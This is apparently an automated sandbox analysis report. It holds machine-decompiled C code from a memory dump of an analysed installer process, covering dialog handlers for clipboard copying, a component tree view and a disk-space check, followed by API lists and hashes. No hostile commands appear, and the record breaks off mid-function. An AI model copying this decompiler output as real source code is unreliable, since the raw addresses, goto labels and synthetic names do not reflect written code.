                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t87;
                                                				unsigned int _t92;
                                                				unsigned int _t93;
                                                				int _t94;
                                                				int _t95;
                                                				long _t98;
                                                				void* _t101;
                                                				intOrPtr _t123;
                                                				struct HWND__* _t127;
                                                				int _t149;
                                                				int _t150;
                                                				struct HWND__* _t154;
                                                				struct HWND__* _t158;
                                                				struct HMENU__* _t160;
                                                				long _t162;
                                                				void* _t163;
                                                				short* _t164;
                                                
                                                				_t154 =  *0x423724; // 0x0
                                                				_t149 = 0;
                                                				_v8 = _t154;
                                                				if(_a8 != 0x110) {
                                                					__eflags = _a8 - 0x405;
                                                					if(_a8 == 0x405) {
                                                						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                					}
                                                					__eflags = _a8 - 0x111;
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						__eflags = _a8 - 0x404;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							__eflags = _a8 - 0x7b;
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							__eflags = _a12 - _t154;
                                                							if(_a12 != _t154) {
                                                								goto L20;
                                                							}
                                                							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                							__eflags = _t87 - _t149;
                                                							_a8 = _t87;
                                                							if(_t87 <= _t149) {
                                                								L37:
                                                								return 0;
                                                							}
                                                							_t160 = CreatePopupMenu();
                                                							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                							_t92 = _a16;
                                                							__eflags = _t92 - 0xffffffff;
                                                							if(_t92 != 0xffffffff) {
                                                								_t150 = _t92;
                                                								_t93 = _t92 >> 0x10;
                                                								__eflags = _t93;
                                                								_t94 = _t93;
                                                							} else {
                                                								GetWindowRect(_t154,  &_v28);
                                                								_t150 = _v28.left;
                                                								_t94 = _v28.top;
                                                							}
                                                							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                							_t162 = 1;
                                                							__eflags = _t95 - 1;
                                                							if(_t95 == 1) {
                                                								_v60 = _t149;
                                                								_v48 = 0x420538;
                                                								_v44 = 0xfff;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                                									__eflags = _a4 - _t149;
                                                									_t162 = _t162 + _t98 + 2;
                                                								} while (_a4 != _t149);
                                                								OpenClipboard(_t149);
                                                								EmptyClipboard();
                                                								_t101 = GlobalAlloc(0x42, _t162);
                                                								_a4 = _t101;
                                                								_t163 = GlobalLock(_t101);
                                                								do {
                                                									_v48 = _t163;
                                                									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                									 *_t164 = 0xa0d;
                                                									_t163 = _t164 + 2;
                                                									_t149 = _t149 + 1;
                                                									__eflags = _t149 - _a8;
                                                								} while (_t149 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(1, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L37;
                                                						}
                                                						__eflags =  *0x42370c - _t149; // 0x0
                                                						if(__eflags == 0) {
                                                							ShowWindow( *0x423f48, 8);
                                                							__eflags =  *0x423fcc - _t149; // 0x0
                                                							if(__eflags == 0) {
                                                								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
                                                							}
                                                							E00403E2D(1);
                                                							goto L25;
                                                						}
                                                						 *0x41f900 = 2;
                                                						E00403E2D(0x78);
                                                						goto L20;
                                                					} else {
                                                						__eflags = _a12 - 0x403;
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E00403EBB(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x423710, _t149);
                                                						ShowWindow(_t154, 8);
                                                						E00403E89(_t154);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_v60 = 2;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t123 =  *0x423f50; // 0x601fd8
                                                				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                				 *0x423710 = GetDlgItem(_a4, 0x403);
                                                				 *0x423708 = GetDlgItem(_a4, 0x3ee);
                                                				_t127 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x423724 = _t127;
                                                				_v8 = _t127;
                                                				E00403E89( *0x423710);
                                                				 *0x423714 = E00404726(4);
                                                				 *0x42372c = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                				if(_a8 >= 0) {
                                                					SendMessageA(_v8, 0x1001, 0, _a8);
                                                					SendMessageA(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t149) {
                                                					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00403E54(_a4);
                                                				if(( *0x423f58 & 0x00000003) != 0) {
                                                					ShowWindow( *0x423710, _t149);
                                                					if(( *0x423f58 & 0x00000002) != 0) {
                                                						 *0x423710 = _t149;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E00403E89( *0x423708);
                                                				}
                                                				_t158 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                				if(( *0x423f58 & 0x00000004) != 0) {
                                                					SendMessageA(_t158, 0x409, _t149, _a12);
                                                					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                				}
                                                				goto L37;
                                                			}


                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405021
                                                • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                                • GetClientRect.USER32 ref: 0040506D
                                                • GetSystemMetrics.USER32 ref: 00405075
                                                • SendMessageA.USER32 ref: 00405096
                                                • SendMessageA.USER32 ref: 004050A7
                                                • SendMessageA.USER32 ref: 004050BA
                                                • SendMessageA.USER32 ref: 004050C8
                                                • SendMessageA.USER32 ref: 004050DB
                                                • ShowWindow.USER32(00000000,?), ref: 004050FD
                                                • ShowWindow.USER32(?,00000008), ref: 00405111
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                                • SendMessageA.USER32 ref: 00405142
                                                • SendMessageA.USER32 ref: 0040515B
                                                • SendMessageA.USER32 ref: 00405167
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                                  • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                                • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                • ShowWindow.USER32(00000000), ref: 004051BD
                                                • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                                • ShowWindow.USER32(00000008), ref: 00405209
                                                • SendMessageA.USER32 ref: 0040523B
                                                • CreatePopupMenu.USER32 ref: 0040524C
                                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                                • GetWindowRect.USER32 ref: 00405274
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                • SendMessageA.USER32 ref: 004052D3
                                                • OpenClipboard.USER32(00000000), ref: 004052E3
                                                • EmptyClipboard.USER32 ref: 004052E9
                                                • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                • GlobalLock.KERNEL32 ref: 004052FC
                                                • SendMessageA.USER32 ref: 00405310
                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                • SetClipboardData.USER32 ref: 00405333
                                                • CloseClipboard.USER32 ref: 00405339
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				void* _v24;
                                                				long _v28;
                                                				int _v32;
                                                				signed int _v40;
                                                				int _v44;
                                                				signed int* _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				long _v68;
                                                				void* _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				void* _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t182;
                                                				intOrPtr _t183;
                                                				int _t189;
                                                				int _t196;
                                                				intOrPtr _t198;
                                                				long _t202;
                                                				signed int _t206;
                                                				signed int _t217;
                                                				void* _t220;
                                                				void* _t221;
                                                				int _t227;
                                                				intOrPtr _t231;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t240;
                                                				signed int _t242;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				struct HBITMAP__* _t250;
                                                				void* _t252;
                                                				char* _t268;
                                                				signed char _t269;
                                                				long _t274;
                                                				int _t280;
                                                				signed int* _t281;
                                                				int _t282;
                                                				long _t283;
                                                				signed int* _t284;
                                                				int _t285;
                                                				long _t286;
                                                				signed int _t287;
                                                				long _t288;
                                                				signed int _t291;
                                                				int _t294;
                                                				signed int _t298;
                                                				signed int _t300;
                                                				signed int _t302;
                                                				intOrPtr _t309;
                                                				int* _t310;
                                                				void* _t311;
                                                				int _t315;
                                                				int _t316;
                                                				int _t317;
                                                				signed int _t318;
                                                				void* _t320;
                                                				void* _t328;
                                                				void* _t331;
                                                
                                                				_v12 = GetDlgItem(_a4, 0x3f9);
                                                				_t182 = GetDlgItem(_a4, 0x408);
                                                				_t280 =  *0x423f68; // 0x602184
                                                				_t320 = SendMessageA;
                                                				_v8 = _t182;
                                                				_t183 =  *0x423f50; // 0x601fd8
                                                				_t315 = 0;
                                                				_v32 = _t280;
                                                				_v20 = _t183 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					__eflags = _a8 - 0x405;
                                                					if(_a8 != 0x405) {
                                                						_t289 = _a16;
                                                					} else {
                                                						_a12 = _t315;
                                                						_t289 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					__eflags = _a8 - 0x4e;
                                                					if(_a8 == 0x4e) {
                                                						L28:
                                                						__eflags = _a8 - 0x413;
                                                						_v16 = _t289;
                                                						if(_a8 == 0x413) {
                                                							L30:
                                                							__eflags =  *0x423f59 & 0x00000002;
                                                							if(( *0x423f59 & 0x00000002) != 0) {
                                                								L41:
                                                								__eflags = _v16 - _t315;
                                                								if(_v16 != _t315) {
                                                									_t232 = _v16;
                                                									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                									}
                                                									_t233 = _v16;
                                                									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                                									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                                										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                                											 *_t284 =  *_t284 & 0xffffffdf;
                                                											__eflags =  *_t284;
                                                										} else {
                                                											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							__eflags = _a8 - 0x413;
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								__eflags = _a8 - 0x413;
                                                								_t289 = 0 | _a8 != 0x00000413;
                                                								_t240 = E00404753(_v8, _a8 != 0x413);
                                                								__eflags = _t240 - _t315;
                                                								if(_t240 >= _t315) {
                                                									_t93 = _t280 + 8; // 0x8
                                                									_t310 = _t240 * 0x418 + _t93;
                                                									_t289 =  *_t310;
                                                									__eflags = _t289 & 0x00000010;
                                                									if((_t289 & 0x00000010) == 0) {
                                                										__eflags = _t289 & 0x00000040;
                                                										if((_t289 & 0x00000040) == 0) {
                                                											_t298 = _t289 ^ 0x00000001;
                                                											__eflags = _t298;
                                                										} else {
                                                											_t300 = _t289 ^ 0x00000080;
                                                											__eflags = _t300;
                                                											if(_t300 >= 0) {
                                                												_t298 = _t300 & 0xfffffffe;
                                                											} else {
                                                												_t298 = _t300 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t310 = _t298;
                                                										E0040117D(_t240);
                                                										_t242 =  *0x423f58; // 0x80
                                                										_t289 = 1;
                                                										_a8 = 0x40f;
                                                										_t245 =  !_t242 >> 0x00000008 & 1;
                                                										__eflags = _t245;
                                                										_a12 = 1;
                                                										_a16 = _t245;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t289 = _a16;
                                                							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                                							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						}
                                                						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                                						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                                							goto L48;
                                                						}
                                                						goto L30;
                                                					} else {
                                                						__eflags = _a8 - 0x413;
                                                						if(_a8 != 0x413) {
                                                							L48:
                                                							__eflags = _a8 - 0x111;
                                                							if(_a8 != 0x111) {
                                                								L56:
                                                								__eflags = _a8 - 0x200;
                                                								if(_a8 == 0x200) {
                                                									SendMessageA(_v8, 0x200, _t315, _t315);
                                                								}
                                                								__eflags = _a8 - 0x40b;
                                                								if(_a8 == 0x40b) {
                                                									_t220 =  *0x420514;
                                                									__eflags = _t220 - _t315;
                                                									if(_t220 != _t315) {
                                                										ImageList_Destroy(_t220);
                                                									}
                                                									_t221 =  *0x42052c;
                                                									__eflags = _t221 - _t315;
                                                									if(_t221 != _t315) {
                                                										GlobalFree(_t221);
                                                									}
                                                									 *0x420514 = _t315;
                                                									 *0x42052c = _t315;
                                                									 *0x423fa0 = _t315;
                                                								}
                                                								__eflags = _a8 - 0x40f;
                                                								if(_a8 != 0x40f) {
                                                									L86:
                                                									__eflags = _a8 - 0x420;
                                                									if(_a8 == 0x420) {
                                                										__eflags =  *0x423f59 & 0x00000001;
                                                										if(( *0x423f59 & 0x00000001) != 0) {
                                                											__eflags = _a16 - 0x20;
                                                											_t189 = (0 | _a16 == 0x00000020) << 3;
                                                											__eflags = _t189;
                                                											_t316 = _t189;
                                                											ShowWindow(_v8, _t316);
                                                											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                										}
                                                									}
                                                									goto L89;
                                                								} else {
                                                									E004011EF(_t289, _t315, _t315);
                                                									__eflags = _a12 - _t315;
                                                									if(_a12 != _t315) {
                                                										E0040140B(8);
                                                									}
                                                									__eflags = _a16 - _t315;
                                                									if(_a16 == _t315) {
                                                										L73:
                                                										E004011EF(_t289, _t315, _t315);
                                                										__eflags =  *0x423f6c - _t315; // 0x2
                                                										_v32 =  *0x42052c;
                                                										_t196 =  *0x423f68; // 0x602184
                                                										_v60 = 0xf030;
                                                										_v16 = _t315;
                                                										if(__eflags <= 0) {
                                                											L84:
                                                											InvalidateRect(_v8, _t315, 1);
                                                											_t198 =  *0x42371c; // 0x608bff
                                                											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                                											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
                                                											}
                                                											goto L86;
                                                										} else {
                                                											_t142 = _t196 + 8; // 0x60218c
                                                											_t281 = _t142;
                                                											do {
                                                												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                												__eflags = _t202 - _t315;
                                                												if(_t202 != _t315) {
                                                													_t291 =  *_t281;
                                                													_v68 = _t202;
                                                													__eflags = _t291 & 0x00000001;
                                                													_v72 = 8;
                                                													if((_t291 & 0x00000001) != 0) {
                                                														_t151 =  &(_t281[4]); // 0x60219c
                                                														_v72 = 9;
                                                														_v56 = _t151;
                                                														_t154 =  &(_t281[0]);
                                                														 *_t154 = _t281[0] & 0x000000fe;
                                                														__eflags =  *_t154;
                                                													}
                                                													__eflags = _t291 & 0x00000040;
                                                													if((_t291 & 0x00000040) == 0) {
                                                														_t206 = (_t291 & 0x00000001) + 1;
                                                														__eflags = _t291 & 0x00000010;
                                                														if((_t291 & 0x00000010) != 0) {
                                                															_t206 = _t206 + 3;
                                                															__eflags = _t206;
                                                														}
                                                													} else {
                                                														_t206 = 3;
                                                													}
                                                													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                                													__eflags = _t294;
                                                													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                													SendMessageA(_v8, 0x1102, _t294, _v68);
                                                													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                												}
                                                												_v16 = _v16 + 1;
                                                												_t281 =  &(_t281[0x106]);
                                                												__eflags = _v16 -  *0x423f6c; // 0x2
                                                											} while (__eflags < 0);
                                                											goto L84;
                                                										}
                                                									} else {
                                                										_t282 = E004012E2( *0x42052c);
                                                										E00401299(_t282);
                                                										_t217 = 0;
                                                										_t289 = 0;
                                                										__eflags = _t282 - _t315;
                                                										if(_t282 <= _t315) {
                                                											L72:
                                                											SendMessageA(_v12, 0x14e, _t289, _t315);
                                                											_a16 = _t282;
                                                											_a8 = 0x420;
                                                											goto L73;
                                                										} else {
                                                											goto L69;
                                                										}
                                                										do {
                                                											L69:
                                                											_t309 = _v20;
                                                											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                                											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                                												_t289 = _t289 + 1;
                                                												__eflags = _t289;
                                                											}
                                                											_t217 = _t217 + 1;
                                                											__eflags = _t217 - _t282;
                                                										} while (_t217 < _t282);
                                                										goto L72;
                                                									}
                                                								}
                                                							}
                                                							__eflags = _a12 - 0x3f9;
                                                							if(_a12 != 0x3f9) {
                                                								goto L89;
                                                							}
                                                							__eflags = _a12 >> 0x10 - 1;
                                                							if(_a12 >> 0x10 != 1) {
                                                								goto L89;
                                                							}
                                                							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                							__eflags = _t227 - 0xffffffff;
                                                							if(_t227 == 0xffffffff) {
                                                								goto L89;
                                                							}
                                                							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                							__eflags = _t283 - 0xffffffff;
                                                							if(_t283 == 0xffffffff) {
                                                								L54:
                                                								_t283 = 0x20;
                                                								L55:
                                                								E00401299(_t283);
                                                								SendMessageA(_a4, 0x420, _t315, _t283);
                                                								_a12 = 1;
                                                								_a16 = _t315;
                                                								_a8 = 0x40f;
                                                								goto L56;
                                                							}
                                                							_t231 = _v20;
                                                							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                                							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                                								goto L55;
                                                							}
                                                							goto L54;
                                                						}
                                                						goto L28;
                                                					}
                                                				} else {
                                                					 *0x423fa0 = _a4;
                                                					_t247 =  *0x423f6c; // 0x2
                                                					_t285 = 2;
                                                					_v28 = 0;
                                                					_v16 = _t285;
                                                					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
                                                					_t250 = LoadBitmapA( *0x423f40, 0x6e);
                                                					 *0x420520 =  *0x420520 | 0xffffffff;
                                                					_v24 = _t250;
                                                					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
                                                					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x420514 = _t252;
                                                					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
                                                					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_v24);
                                                					_t286 = 0;
                                                					do {
                                                						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                							if(_t286 != 0x20) {
                                                								_v16 = _t315;
                                                							}
                                                							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                						}
                                                						_t286 = _t286 + 1;
                                                					} while (_t286 < 0x21);
                                                					_t317 = _a16;
                                                					_t287 = _v16;
                                                					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                					_push(0x15);
                                                					E00403E54(_a4);
                                                					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                					_push(0x16);
                                                					E00403E54(_a4);
                                                					_t318 = 0;
                                                					_t288 = 0;
                                                					_t328 =  *0x423f6c - _t318; // 0x2
                                                					if(_t328 <= 0) {
                                                						L19:
                                                						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t311 = _v32 + 8;
                                                						_v24 = _t311;
                                                						do {
                                                							_t268 = _t311 + 0x10;
                                                							if( *_t268 != 0) {
                                                								_v60 = _t268;
                                                								_t269 =  *_t311;
                                                								_t302 = 0x20;
                                                								_v84 = _t288;
                                                								_v80 = 0xffff0002;
                                                								_v76 = 0xd;
                                                								_v64 = _t302;
                                                								_v40 = _t318;
                                                								_v68 = _t269 & _t302;
                                                								if((_t269 & 0x00000002) == 0) {
                                                									__eflags = _t269 & 0x00000004;
                                                									if((_t269 & 0x00000004) == 0) {
                                                										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                									} else {
                                                										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                									}
                                                								} else {
                                                									_v76 = 0x4d;
                                                									_v44 = 1;
                                                									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                									_v28 = 1;
                                                									 *( *0x42052c + _t318 * 4) = _t274;
                                                									_t288 =  *( *0x42052c + _t318 * 4);
                                                								}
                                                							}
                                                							_t318 = _t318 + 1;
                                                							_t311 = _v24 + 0x418;
                                                							_t331 = _t318 -  *0x423f6c; // 0x2
                                                							_v24 = _t311;
                                                						} while (_t331 < 0);
                                                						if(_v28 != 0) {
                                                							L20:
                                                							if(_v16 != 0) {
                                                								E00403E89(_v8);
                                                								_t280 = _v32;
                                                								_t315 = 0;
                                                								__eflags = 0;
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E00403E89(_v12);
                                                								L89:
                                                								return E00403EBB(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}


                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				long _v16;
                                                				long _v20;
                                                				long _v24;
                                                				char _v28;
                                                				intOrPtr _v32;
                                                				long _v36;
                                                				char _v40;
                                                				unsigned int _v44;
                                                				signed int _v48;
                                                				CHAR* _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				intOrPtr _v68;
                                                				CHAR* _v72;
                                                				void _v76;
                                                				struct HWND__* _v80;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t82;
                                                				long _t87;
                                                				signed char* _t89;
                                                				void* _t95;
                                                				signed int _t96;
                                                				int _t109;
                                                				signed short _t114;
                                                				signed int _t118;
                                                				struct HWND__** _t122;
                                                				intOrPtr _t124;
                                                				intOrPtr* _t138;
                                                				CHAR* _t146;
                                                				intOrPtr _t147;
                                                				unsigned int _t150;
                                                				signed int _t152;
                                                				unsigned int _t156;
                                                				signed int _t158;
                                                				signed int* _t159;
                                                				struct HWND__* _t165;
                                                				struct HWND__* _t166;
                                                				int _t168;
                                                				unsigned int _t197;
                                                
                                                				_t156 = __edx;
                                                				_t82 =  *0x41fd08;
                                                				_v32 = _t82;
                                                				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
                                                				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                				if(_a8 == 0x40b) {
                                                					E0040543D(0x3fb, _t146);
                                                					E00405DFA(_t146);
                                                				}
                                                				_t166 = _a4;
                                                				if(_a8 != 0x110) {
                                                					L8:
                                                					if(_a8 != 0x111) {
                                                						L20:
                                                						if(_a8 == 0x40f) {
                                                							L22:
                                                							_v8 = _v8 & 0x00000000;
                                                							_v12 = _v12 & 0x00000000;
                                                							E0040543D(0x3fb, _t146);
                                                							if(E0040576C(_t185, _t146) == 0) {
                                                								_v8 = 1;
                                                							}
                                                							E00405B98(0x41f500, _t146);
                                                							_t87 = E00405F28(1);
                                                							_v16 = _t87;
                                                							if(_t87 == 0) {
                                                								L30:
                                                								E00405B98(0x41f500, _t146);
                                                								_t89 = E0040571F(0x41f500);
                                                								_t158 = 0;
                                                								if(_t89 != 0) {
                                                									 *_t89 =  *_t89 & 0x00000000;
                                                								}
                                                								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                									goto L35;
                                                								} else {
                                                									_t168 = 0x400;
                                                									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                									asm("cdq");
                                                									_v48 = _t109;
                                                									_v44 = _t156;
                                                									_v12 = 1;
                                                									goto L36;
                                                								}
                                                							} else {
                                                								_t159 = 0;
                                                								if(0 == 0x41f500) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t159 = E004056D2(0x41f500) - 1;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x41f500) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
